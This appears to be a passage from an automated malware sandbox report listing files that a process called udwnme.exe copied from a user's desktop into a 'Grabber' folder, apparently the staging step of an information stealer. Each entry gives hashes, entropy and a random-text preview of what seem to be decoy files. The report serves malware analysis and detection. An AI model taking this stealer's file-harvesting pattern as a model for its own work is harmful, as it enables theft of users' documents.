                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\VLZDGUKUTZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\RAYHIWGKDI.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                  Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\DVWHKMNFNN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694985340190863
                                                                  Encrypted:false
                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                  Malicious:false
                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\KATAXZVCPS.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\NWTVCDUMOB.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.696250160603532
                                                                  Encrypted:false
                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                  Malicious:false
                                                                  Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

